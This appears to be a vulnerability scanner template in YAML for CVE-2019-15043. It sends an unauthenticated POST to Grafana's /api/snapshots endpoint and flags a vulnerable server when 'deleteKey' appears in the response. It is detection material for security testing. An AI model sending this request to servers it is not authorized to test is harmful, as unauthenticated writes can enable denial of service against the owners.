36 lines
1.3 KiB
YAML
36 lines
1.3 KiB
YAML
id: CVE-2019-15043
|
|
info:
|
|
author: bing0o
|
|
name: Grafana unauthenticated API
|
|
severity: high
|
|
description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
|
|
reference:
|
|
- https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
|
|
- https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
|
|
- https://community.grafana.com/t/release-notes-v6-3-x/19202
|
|
tags: cve,cve2019,grafana
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
cvss-score: 7.50
|
|
cve-id: CVE-2019-15043
|
|
cwe-id: CWE-306
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /api/snapshots HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Connection: close
|
|
Content-Length: 235
|
|
Accept: */*
|
|
Accept-Language: en
|
|
Content-Type: application/json
|
|
|
|
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
|
|
|
|
matchers:
|
|
- part: body
|
|
type: word
|
|
words:
|
|
- deleteKey
|